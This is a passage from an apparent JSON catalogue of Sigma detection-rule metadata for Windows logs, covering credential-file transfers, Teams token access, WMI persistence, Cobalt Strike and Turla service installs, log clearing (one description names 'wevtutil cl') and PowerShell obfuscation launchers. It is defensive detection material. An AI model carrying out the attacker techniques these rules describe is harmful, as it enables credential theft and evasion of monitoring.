"Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", - "uuid": "9c8afa4d-0022-48f0-9456-3712466f9701", - "value": "Tap Driver Installation - Security", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_tap_driver_installation.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048" - ], - "creation_date": "2019/10/24", - "filename": "win_security_tap_driver_installation.yml", - "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate OpenVPN TAP insntallation" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "uuid": "25cde13e-8e20-4c29-b949-4e795b76f16f", - "value": "Suspicious Teams Application Related ObjectAcess Event", - "meta": { - "refs": [ - "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", - "https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_teams_suspicious_objectaccess.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1528" - ], - "creation_date": "2022/09/16", - "filename": "win_security_teams_suspicious_objectaccess.yml", - "author": "@SerkinValery", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Transferring files with well-known filenames (sensitive files with credential data) using network shares", - "uuid": "910ab938-668b-401b-b08c-b596e80fdca5", - "value": "Transferring Files with Credential Data via Network Shares", - "meta": { - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_transf_files_with_cred_data_via_network_shares.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.001", - "attack.t1003.003" - ], - "creation_date": "2019/10/22", - "filename": "win_security_transf_files_with_cred_data_via_network_shares.yml", - "author": "Teymur Kheirkhabarov, oscd.community", - "level": "medium", - "falsepositive": [ - "Transferring sensitive files for legitimate administration work by legitimate administrator" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "This rule triggers on user accounts that are added to the local Administrators group, which could be legitimate activity or a sign of privilege escalation activity", - "uuid": "c265cf08-3f99-46c1-8d59-328247057d57", - "value": "User Added to Local Administrators", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_added_to_local_administrators.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1078", - "attack.persistence", - "attack.t1098" - ], - "creation_date": "2017/03/14", - "filename": "win_security_user_added_to_local_administrators.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Legitimate administrative activity" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA.", - "uuid": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", - "value": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'", - "meta": { - "refs": [ - "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.t1558.003" - ], - "creation_date": "2019/10/24", - "filename": "win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml", - "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects local user creation on windows servers, which shouldn't happen in an Active Directory environment. Apply this Sigma Use Case on your windows server logs and not on your DC logs.", - "uuid": "66b6be3d-55d0-4f47-9855-d69df21740ea", - "value": "Local User Creation", - "meta": { - "refs": [ - "https://patrick-bareiss.com/detecting-local-user-creation-in-ad-with-sigma/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_creation.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1136.001" - ], - "creation_date": "2019/04/18", - "filename": "win_security_user_creation.yml", - "author": "Patrick Bareiss", - "level": "low", - "falsepositive": [ - "Domain Controller Logs", - "Local accounts managed by privileged account management tools" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the loading of drivers via 'SeLoadDriverPrivilege' required to load or unload a device driver.\nWith this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode.\nThis user right does not apply to Plug and Play device drivers.\nIf you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers.\nThis will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools.\nSo you have to work with a whitelist to find the bad stuff.\n", - "uuid": "f63508a0-c809-4435-b3be-ed819394d612", - "value": "Suspicious Driver Loaded By User", - "meta": { - "refs": [ - "https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4673", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_driver_loaded.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2019/04/08", - "filename": "win_security_user_driver_loaded.yml", - "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", - "level": "medium", - "falsepositive": [ - "Other legimate tools loading drivers. There are some: Sysinternals, CPU-Z, AVs etc. - but not much. You have to baseline this according to your used products and allowed tools. Also try to exclude users, which are allowed to load drivers." - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects a user log-off activity. Could be used for example to correlate information during forensic investigations", - "uuid": "0badd08f-c6a3-4630-90d3-6875cca440be", - "value": "User Logoff Event", - "meta": { - "refs": [ - "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4634", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4647", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_logoff.yml" - ], - "tags": "No established tags", - "creation_date": "2022/10/14", - "filename": "win_security_user_logoff.yml", - "author": "frack113", - "level": "informational", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the registration of the security event source VSSAudit. It would usually trigger when volume shadow copy operations happen.", - "uuid": "e9faba72-4974-4ab2-a4c5-46e25ad59e9b", - "value": "VSSAudit Security Event Source Registration", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_vssaudit_secevent_source_registration.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002" - ], - "creation_date": "2020/10/20", - "filename": "win_security_vssaudit_secevent_source_registration.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", - "level": "informational", - "falsepositive": [ - "Legitimate use of VSSVC. Maybe backup operations. It would usually be done by C:\\Windows\\System32\\VSSVC.exe." - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.", - "uuid": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", - "value": "T1047 Wmiprvse Wbemcomn DLL Hijack", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009173318.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_wmiprvse_wbemcomn_dll_hijack.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" - ], - "creation_date": "2020/10/12", - "filename": "win_security_wmiprvse_wbemcomn_dll_hijack.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", - "uuid": "f033f3f3-fd24-4995-97d8-a3bb17550a88", - "value": "WMI Persistence - Security", - "meta": { - "refs": [ - "https://twitter.com/mattifestation/status/899646620148539397", - "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_wmi_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.003" - ], - "creation_date": "2017/08/22", - "filename": "win_security_wmi_persistence.yml", - "author": "Florian Roth, Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown (data set is too small; further testing needed)" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL", - "uuid": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86", - "value": "Microsoft Defender Blocked from Loading Unsigned DLL", - "meta": { - "refs": [ - "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ], - "creation_date": "2022/08/02", - "filename": "win_security_mitigations_defender_load_unsigned_dll.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations", - "uuid": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", - "value": "Unsigned Binary Loaded From Suspicious Location", - "meta": { - "refs": [ - "https://github.com/nasbench/EVTX-ETW-Resources/blob/45fd5be71a51aa518b1b36d4e1f36af498084e27/ETWEventsList/CSV/Windows11/21H2/W11_21H2_Pro_20220719_22000.795/Providers/Microsoft-Windows-Security-Mitigations.csv", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ], - "creation_date": "2022/08/03", - "filename": "win_security_mitigations_unsigned_dll_from_susp_location.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.", - "uuid": "b55d23e5-6821-44ff-8a6e-67218891e49f", - "value": "HybridConnectionManager Service Running", - "meta": { - "refs": [ - "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/servicebus/win_hybridconnectionmgr_svc_running.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1554" - ], - "creation_date": "2021/04/12", - "filename": "win_hybridconnectionmgr_svc_running.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "high", - "falsepositive": [ - "Legitimate use of Hybrid Connection Manager via Azure function apps." - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious application installed by looking at the added shortcut to the app resolver cache", - "uuid": "83c161b6-ca67-4f33-8ad0-644a0737cf07", - "value": "Suspicious Application Installed", - "meta": { - "refs": [ - "https://nasbench.medium.com/finding-forensic-goodness-in-obscure-windows-event-logs-60e978ea45a3", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/shell_core/win_shell_core_susp_packages_installed.yml" - ], - "tags": [ - "attack.execution" - ], - "creation_date": "2022/08/14", - "filename": "win_shell_core_susp_packages_installed.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Packages or applications being legitimately used by users or administrators" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in Windows Spooler Service", - "uuid": "71886b70-d7b4-4dbf-acce-87d2ca135262", - "value": "Suspicious Rejected SMB Guest Logon From IP", - "meta": { - "refs": [ - "https://twitter.com/KevTheHermit/status/1410203844064301056", - "https://github.com/hhlxf/PrintNightmare", - "https://github.com/afwu/PrintNightmare", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/smbclient/win_susp_failed_guest_logon.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1110.001" - ], - "creation_date": "2021/06/30", - "filename": "win_susp_failed_guest_logon.yml", - "author": "Florian Roth, KevTheHermit, fuzzyf10w", - "level": "medium", - "falsepositive": [ - "Account fallback reasons (after failed login with specific account)" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects repeated failed (outgoing) attempts to mount a hidden share", - "uuid": "1c3be8c5-6171-41d3-b792-cab6f717fcdb", - "value": "Failed Mounting of Hidden Share", - "meta": { - "refs": [ - "https://twitter.com/moti_b/status/1032645458634653697", - "https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Cyber-Security/SiSyPHuS/AP10/Logging_Configuration_Guideline.pdf?__blob=publicationFile&v=5", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml" - ], - "tags": [ - "attack.t1021.002", - "attack.lateral_movement" - ], - "creation_date": "2022/08/30", - "filename": "win_susp_failed_hidden_share_mount.yml", - "author": "Fabian Franz", - "level": "medium", - "falsepositive": [ - "Legitimate administrative activity", - "Faulty scripts" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects application popup reporting a failure of the Sysmon service", - "uuid": "4d7f1827-1637-4def-8d8a-fd254f9454df", - "value": "Sysmon Crash", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_application_sysmon_crash.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562" - ], - "creation_date": "2022/04/26", - "filename": "win_system_application_sysmon_crash.yml", - "author": "Tim Shelton", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET", - "uuid": "1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4", - "value": "Turla Service Install", - "meta": { - "refs": [ - "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_apt_carbonpaper_turla.yml" - ], - "tags": [ - "attack.persistence", - "attack.g0010", - "attack.t1543.003" - ], - "creation_date": "2017/03/31", - "filename": "win_system_apt_carbonpaper_turla.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018", - "uuid": "53ba33fd-3a50-4468-a5ef-c583635cfa92", - "value": "Chafer Activity - System", - "meta": { - "refs": [ - "https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_apt_chafer_mar18_system.yml" - ], - "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" - ], - "creation_date": "2018/03/23", - "filename": "win_system_apt_chafer_mar18_system.yml", - "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky", - "uuid": "9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6", - "value": "StoneDrill Service Install", - "meta": { - "refs": [ - "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_apt_stonedrill.yml" - ], - "tags": [ - "attack.persistence", - "attack.g0064", - "attack.t1543.003" - ], - "creation_date": "2017/03/07", - "filename": "win_system_apt_stonedrill.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018", - "uuid": "1228f8e2-7e79-4dea-b0ad-c91f1d5016c1", - "value": "Turla PNG Dropper Service", - "meta": { - "refs": [ - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_apt_turla_service_png.yml" - ], - "tags": [ - "attack.persistence", - "attack.g0010", - "attack.t1543.003" - ], - "creation_date": "2018/11/23", - "filename": "win_system_apt_turla_service_png.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", - "uuid": "5a105d34-05fc-401e-8553-272b45c1522d", - "value": "CobaltStrike Service Installations - System", - "meta": { - "refs": [ - "https://www.sans.org/webcasts/119395", - "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", - "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_cobaltstrike_service_installs.yml" - ], - "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" - ], - "creation_date": "2021/05/26", - "filename": "win_system_cobaltstrike_service_installs.yml", - "author": "Florian Roth, Wojciech Lesicki", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the \"Windows Defender Threat Protection\" service has been disabled", - "uuid": "6c0a7755-6d31-44fa-80e1-133e57752680", - "value": "Windows Defender Threat Detection Disabled - Service", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_defender_disabled.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2020/07/28", - "filename": "win_system_defender_disabled.yml", - "author": "J\u00e1n Tren\u010dansk\u00fd, frack113", - "level": "low", - "falsepositive": [ - "Administrator actions", - "Auto updates of Windows Defender causes restarts" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", - "uuid": "a62b37e0-45d3-48d9-a517-90c1a1b0186b", - "value": "Eventlog Cleared", - "meta": { - "refs": [ - "https://twitter.com/deviouspolack/status/832535435960209408", - "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_eventlog_cleared.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" - ], - "creation_date": "2017/01/10", - "filename": "win_system_eventlog_cleared.yml", - "author": "Florian Roth", - "level": "low", - "falsepositive": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of smbexec.py tool by detecting a specific service installation", - "uuid": "52a85084-6989-40c3-8f32-091e12e13f09", - "value": "smbexec.py Service Installation", - "meta": { - "refs": [ - "https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_hack_smbexec.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.execution", - "attack.t1021.002", - "attack.t1569.002" - ], - "creation_date": "2018/03/20", - "filename": "win_system_hack_smbexec.yml", - "author": "Omer Faruk Celik", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "uuid": "f7385ee2-0e0c-11eb-adc1-0242ac120002", - "value": "Invoke-Obfuscation CLIP+ Launcher - System", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_clip_services.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/13", - "filename": "win_system_invoke_obfuscation_clip_services.yml", - "author": "Jonathan Cheong, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", - "uuid": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", - "value": "Invoke-Obfuscation Obfuscated IEX Invocation - System", - "meta": { - "refs": [ - "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_obfuscated_iex_services.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027" - ], - "creation_date": "2019/11/08", - "filename": "win_system_invoke_obfuscation_obfuscated_iex_services.yml", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "uuid": "72862bf2-0eb1-11eb-adc1-0242ac120002", - "value": "Invoke-Obfuscation STDIN+ Launcher - System", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_stdin_services.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/15", - "filename": "win_system_invoke_obfuscation_stdin_services.yml", - "author": "Jonathan Cheong, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "uuid": "8ca7004b-e620-4ecb-870e-86129b5b8e75", - "value": "Invoke-Obfuscation VAR+ Launcher - System", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_var_services.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/15", - "filename": "win_system_invoke_obfuscation_var_services.yml", - "author": "Jonathan Cheong, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "uuid": "175997c5-803c-4b08-8bb0-70b099f47595", - "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - System", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_compress_services.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/18", - "filename": "win_system_invoke_obfuscation_via_compress_services.yml", - "author": "Timur Zinniatullin, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "uuid": "11b52f18-aaec-4d60-9143-5dd8cc4706b9", - "value": "Invoke-Obfuscation RUNDLL LAUNCHER - System", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_rundll_services.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/18", - "filename": "win_system_invoke_obfuscation_via_rundll_services.yml", - "author": "Timur Zinniatullin, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "uuid": "487c7524-f892-4054-b263-8a0ace63fc25", - "value": "Invoke-Obfuscation Via Stdin - System", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_stdin_services.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/12", - "filename": "win_system_invoke_obfuscation_via_stdin_services.yml", - "author": "Nikita Nazarov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "uuid": "63e3365d-4824-42d8-8b82-e56810fefa0c", - "value": "Invoke-Obfuscation Via Use Clip - System", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_use_clip_services.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/09", - "filename": "win_system_invoke_obfuscation_via_use_clip_services.yml", - "author": "Nikita Nazarov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "uuid": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", - "value": "Invoke-Obfuscation Via Use MSHTA - System", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_use_mshta_services.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/09", - "filename": "win_system_invoke_obfuscation_via_use_mshta_services.yml", - "author": "Nikita Nazarov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "uuid": "641a4bfb-c017-44f7-800c-2aee0184ce9b", - "value": "Invoke-Obfuscation Via Use Rundll32 - System", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_use_rundll32_services.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/09", - "filename": "win_system_invoke_obfuscation_via_use_rundll32_services.yml", - "author": "Nikita Nazarov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "uuid": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", - "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_var_services.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/13", - "filename": 